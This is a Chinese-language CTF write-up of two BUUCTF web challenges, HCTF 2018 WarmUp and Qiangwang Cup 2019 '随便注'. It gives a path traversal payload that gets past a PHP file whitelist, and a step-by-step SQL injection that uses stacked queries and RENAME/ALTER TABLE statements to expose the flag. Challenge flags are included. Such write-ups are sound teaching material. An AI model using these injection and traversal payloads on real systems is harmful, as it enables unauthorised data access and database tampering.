BUUCTF web WP

0x01 [HCTF 2018]WarmUp

f12看到提示进入source.php，看到代码

分析第一段代码，$page满足whitelist就返回true

进入hint.php，得到提示：flag in ffffllllaaaagggg

分析第二段代码，$_page对应payload的'?'以前的字符串

分析第三段代码，若$_page经过urldecode后满足whitelist就返回true

分析第四段代码，输入正确则保存flag到参数file，否则展示滑稽图片

由此构造payload1：?file=hint.php?/../../../../ffffllllaaaagggg（$page取'?'以前是hint.php)

payload1：?file=hint.php%3f/../../../../ffffllllaaaagggg($page urldecode后是hint.php?，再取'?'以前是hint.php）

flag{62088940-057b-490a-bc9b-3f8623d0137e}

0x02 [强网杯 2019]随便注

基本操作

输入1'不回显，输入1' #回显正常，所以存在sql注入

输入1' or '1'='1回显字符，所以是字符型注入，但是没有查询到flag

输入1' order by 1 #回显正常，输入1' order by 2 #回显正常，输入1' order by 3 #回显失败，所以字段数为2

输入1' union select 1,2#回显了正则过滤规则，其中过滤了select,update,delete,drop,insert,where,\.

过滤了这么多词，猜测有堆叠注入。输入1';show databases;#回显正常，所以确实有堆叠注入

输入1';show tables;#回显正常，得到words和1919810931114514两个表

输入1'; show columns from `words`; # 找到id列

输入1'; show columns from `1919810931114514`; # 找到flag列

骚操作

①之所以前面没有查询到flag是因为堆叠注入，当执行查询后，第一条显示查询信息，第二条则将整个1919810931114514表进行删除，而内部查询语句类似 :select id, data from word where id =

②既然他没过滤rename和alter，输入1';RENAME TABLE `words` TO `words2`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;#将表和列改名，从而避免查询失败

③输入1' or '1'='1查询，得到flag{4f217c29-1f20-4169-aff4-bfcfe0de56ba}